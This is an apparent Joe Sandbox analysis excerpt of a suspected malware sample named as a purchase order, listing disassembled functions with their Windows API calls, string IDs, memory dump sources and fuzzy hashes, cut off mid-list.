                                  • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                  • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                  Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _strncmp
                                  • String ID: Q\E
                                  • API String ID: 909875538-2189900498
                                  • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                  • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                  Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                  • String ID: AutoIt3GUI$Container
                                  • API String ID: 2652923123-3941886329
                                  • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                  • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                  • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                  • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                  Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove_strncmp
                                  • String ID: U$\
                                  • API String ID: 2666721431-100911408
                                  • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                  • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                  • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                  • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                  Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • __wcsnicmp.LIBCMT ref: 00467288
                                  • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                  • String ID: LPT
                                  • API String ID: 3035604524-1350329615
                                  • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                  • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                  • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                  • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                  Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \$h
                                  • API String ID: 4104443479-677774858
                                  • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                  • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                  • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                  • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                  Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memcmp
                                  • String ID: &
                                  • API String ID: 2931989736-1010288
                                  • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                  • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                  • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                  • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                  Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \
                                  • API String ID: 4104443479-2967466578
                                  • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                  • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                  • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                  • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                  Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 00466825
                                  • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CrackInternet_wcslen
                                  • String ID: |
                                  • API String ID: 596671847-2343686810
                                  • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                  • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                  • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                  • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                  Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: '
                                  • API String ID: 3850602802-1997036262
                                  • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                  • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                  Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • _strlen.LIBCMT ref: 0040F858
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                  • _sprintf.LIBCMT ref: 0040F9AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove$_sprintf_strlen
                                  • String ID: %02X
                                  • API String ID: 1921645428-436463671
                                  • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                  • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                  Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: Combobox
                                  • API String ID: 3850602802-2096851135
                                  • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                  • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                  • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                  • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                  Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: LengthMessageSendTextWindow
                                  • String ID: edit
                                  • API String ID: 2978978980-2167791130
                                  • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                  • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                  • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                  • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                  Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 00476CB0
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: GlobalMemorySleepStatus
                                  • String ID: @
                                  • API String ID: 2783356886-2766056989
                                  • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                  • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                  • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                  • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                  Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: htonsinet_addr
                                  • String ID: 255.255.255.255
                                  • API String ID: 3832099526-2422070025
                                  • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                  • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                  • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                  • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                  Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID: <local>
                                  • API String ID: 2038078732-4266983199
                                  • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                  • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                  • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                  • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                  Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
